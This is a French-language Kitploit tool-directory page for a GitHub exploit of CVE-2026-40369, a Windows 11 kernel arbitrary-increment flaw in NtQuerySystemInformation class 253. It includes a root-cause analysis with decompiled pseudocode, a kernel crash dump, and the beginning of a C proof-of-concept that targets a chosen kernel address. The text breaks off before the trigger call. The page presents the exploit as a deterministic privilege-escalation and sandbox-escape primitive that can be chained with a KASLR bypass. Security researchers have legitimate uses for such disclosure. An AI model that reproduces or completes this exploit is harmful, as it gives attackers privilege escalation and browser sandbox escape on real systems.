Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-40369-EXPLOIT — Code d'exploit complet pour CVE-2026-40369 - Une vulnérabilité d'écriture arbitraire du noyau Windows qui permet une évasion du sandbox du navigateur depuis le sandbox du processus de rendu de tous les navigateurs. | Kitploit
Outils/GitHubGitHub/orinimron123/cve-2026-40369-exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation de Binaires
GitHuborinimron123/cve-2026-40369-exploit

CVE-2026-40369-EXPLOIT

Code d'exploit complet pour CVE-2026-40369 - Une vulnérabilité d'écriture arbitraire du noyau Windows qui permet une évasion du sandbox du navigateur depuis le sandbox du processus de rendu de tous les navigateurs.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
2605812il y a 4 moisVérifié par Kitploit

Blog complet - https://pwn2nimron.com/blog

CVE-2026-40369 : Incrémentation arbitraire d'adresse noyau via NtQuerySystemInformation (Classe 253)

Résumé

  • Type : Écriture arbitraire dans le noyau (incrémentation) — PRIMITIVE D'ÉLÉVATION DE PRIVILÈGES
  • Composant : ntoskrnl.exe — ExpGetProcessInformation
  • Déclencheur : NtQuerySystemInformation(SystemProcessInformationExtension, kernelAddr, 0, &needed)
  • Impact : Incrémentation arbitraire d'adresse noyau (primitive d'écriture) depuis tout processus non privilégié
  • Accessible depuis le sandbox Chrome : OUI (NtQuerySystemInformation n'est pas bloqué)
  • Versions Windows : Windows 11 24H2-25H2
  • Fiabilité de l'exploit : 100 % déterministe
  • Le contournement KASLR peut être chaîné avec l'outil prefetch https://github.com/exploits-forsale/prefetch-tool

Cause racine

ExpGetProcessInformation est appelé par ExpQuerySystemInformation pour les classes d'information 5 (SystemProcessInformation), 0x39, 0x94, 0xFC et 0xFD (253 = SystemProcessInformationExtension).

Le site d'appel à ExpQuerySystemInformation+0xD7A :

// Les cas 5, 0x39, 0x94, 0xFC, 0xFD partagent tous cet appel :
result = ExpGetProcessInformation((unsigned int *)userBuffer, bufferLength, &returnSize, NULL, infoClass);

Lorsque userBuffer pointe également vers le noyau (par exemple, pour sonder la taille de buffer nécessaire), la fonction entre dans :

// ExpGetProcessInformation, simplifié :
__int64 ExpGetProcessInformation(unsigned int *buffer, unsigned int length, ..., int infoClass)
{
    v91 = buffer;  // = NULL

    if (infoClass == 252) {
        v86 = v91;  // la classe 252 utilise v86
        // ...
    } else {
        v86 = NULL;
        if (infoClass == 253) {
            v95 = v91;  // v95 = NULL (BUG : absence de vérification pour l'adresse noyau !)
            goto LABEL_11;
        }
        // chemin classe 5 - utilise v81, ne touche pas à v95
    }
    v95 = NULL;  // le chemin classe 252 arrive ici

LABEL_11:
    // ... boucle d'itération sur les processus ...
    while (NextProcess) {
        if (infoClass == 253) {
            ++*v95;          // CRASH : v95 est une adresse noyau arbitraire
            v95[1] += ...;   // Provoquerait aussi un crash
            v95[2] += ...;   // Provoquerait aussi un crash
        }
        // les chemins classes 5/252 gèrent correctement le buffer NULL
    }
}

Pour la classe 253, v95 est défini sur le pointeur de buffer (v91 = buffer = NULL) sans aucune vérification NULL. La boucle d'itération sur les processus tente ensuite d'incrémenter un compteur à *v95, provoquant un déréférencement de pointeur NULL en mode noyau → écran bleu.

Les classes 5 et 252 gèrent correctement les buffers NULL car elles utilisent des variables différentes (v81/v86) et ont des vérifications appropriées avant le déréférencement.

Détails du crash

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffff800041424344, memory referenced.
Arg2: 0000000000000002, X64: bit 0 set if the fault was due to a not-present PTE.
	bit 1 is set if the fault was due to a write, clear if a read.
	bit 3 is set if the processor decided the fault was due to a corrupted PTE.
	bit 4 is set if the fault was due to attempted execute of a no-execute PTE.
	- ARM64: bit 1 is set if the fault was due to a write, clear if a read.
	bit 3 is set if the fault was due to attempted execute of a no-execute PTE.
Arg3: fffff803a06db22e, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 0000000000000002, (reserved)

IP_IN_PAGED_CODE: 
nt!ExpGetProcessInformation+42e
fffff803`a06db22e ff03            inc     dword ptr [rbx]

STACK_TEXT:  
*** WARNING: Unable to verify checksum for poc.exe
Unable to load image C:\Users\vm\poc.exe, Win32 error 0n2
ffffd380`d4dc52f8 fffff803`a01b2d82     : ffffd380`d4dc5378 00000000`00000001 00000000`00000100 fffff803`a02c4801 : nt!DbgBreakPointWithStatus
ffffd380`d4dc5300 fffff803`a01b22ac     : 00000000`00000003 ffffd380`d4dc5460 fffff803`a02c4970 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
ffffd380`d4dc5360 fffff803`a00fba97     : 00000000`00000000 fffff803`9fe46273 00000000`00000000 00000000`00000000 : nt!KeBugCheck2+0xb2c
ffffd380`d4dc5af0 fffff803`9fe29dc0     : 00000000`00000050 ffff8000`41424344 00000000`00000002 ffffd380`d4dc5d90 : nt!KeBugCheckEx+0x107
ffffd380`d4dc5b30 fffff803`9fe16d96     : fffff803`a0bd9680 ffff8000`00000000 ffff8000`41424344 0000007f`fffffff8 : nt!MiSystemFault+0x850
ffffd380`d4dc5c20 fffff803`a02b9ecb     : 00000000`00000000 00000000`0000000f 00000000`00000000 0000000c`00000000 : nt!MmAccessFault+0x646
ffffd380`d4dc5d90 fffff803`a06db22e     : 00000000`00000001 00000000`00000001 00000000`c0000004 00000000`000000fd : nt!KiPageFault+0x38b
ffffd380`d4dc5f20 fffff803`a06dcfbf     : 00000000`00000000 00000000`00000000 ffff8701`f54e4118 00000000`00000000 : nt!ExpGetProcessInformation+0x42e
ffffd380`d4dc6540 fffff803`a06e1061     : 00000000`00001000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ExpQuerySystemInformation+0xd7f
ffffd380`d4dc6aa0 fffff803`a02be355     : 00000285`00b20000 ffff8701`f54e4080 ffff8701`f54e4080 00000000`00000000 : nt!NtQuerySystemInformation+0x91
ffffd380`d4dc6ae0 00007ffd`5bc82154     : 00007ff6`f01c10ef 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 : nt!KiSystemServiceCopyEnd+0x25
000000e8`7679faf8 00007ff6`f01c10ef     : 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 00000285`00da4eb5 : ntdll!NtQuerySystemInformation+0x14
000000e8`7679fb00 00007ff6`f01c1374     : 00000000`00000000 00000285`00da3ab0 00000000`00000000 00000000`00000000 : poc+0x10ef
000000e8`7679fb30 00007ffd`5a5ae8d7     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : poc+0x1374
000000e8`7679fb70 00007ffd`5bbac48c     : 00000000`00000000 00000000`00000000 000004f0`fffffb30 000004d0`fffffb30 : KERNEL32!BaseThreadInitThunk+0x17
000000e8`7679fba0 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2c

Reproduction

Reproducteur minimal (non privilégié, aucun jeton spécial requis) :

/**
 * poc.c — NtQuerySystemInformation class 253 arbitrary kernel increment PoC
 *
 * Demonstrates arbitrary kernel DWORD increment via ProbeForWrite bypass.
 * Passes a kernel address as the output buffer with Length=0, causing
 * ExpGetProcessInformation to increment DWORDs at the target address
 * without validation.
 *
 * Build: cl /W4 /O2 poc.c /Fe:poc.exe /link ntdll.lib
 */

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ntdll.lib")

typedef long NTSTATUS;

#define SystemProcessInformationExtension 253

typedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

int main(void)
{
    PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");

    if (!pNtQSI) {
        printf("[-] Failed to resolve NtQuerySystemInformation\n");
        return 1;
    }

    PVOID target = (PVOID)0xffff800041424344ULL;

    printf("[*] NtQuerySystemInformation class 253 arbitrary kernel increment PoC\n");
    printf("[*] Target kernel address: %p\n", target);
    printf("[*] Will write:\n");
    printf("      [target+0] += num_processes  (DWORD increment)\n");
    printf("      [target+4] += total_threads  (DWORD add)\n");
    printf("      [target+8] += total_handles  (DWORD add)\n");
    printf("\n");
    printf("[!] This WILL bugcheck if the address is not mapped writable memory.\n");
    printf("[*] Press Enter to trigger...\n");
    getchar();
Télécharger l’outil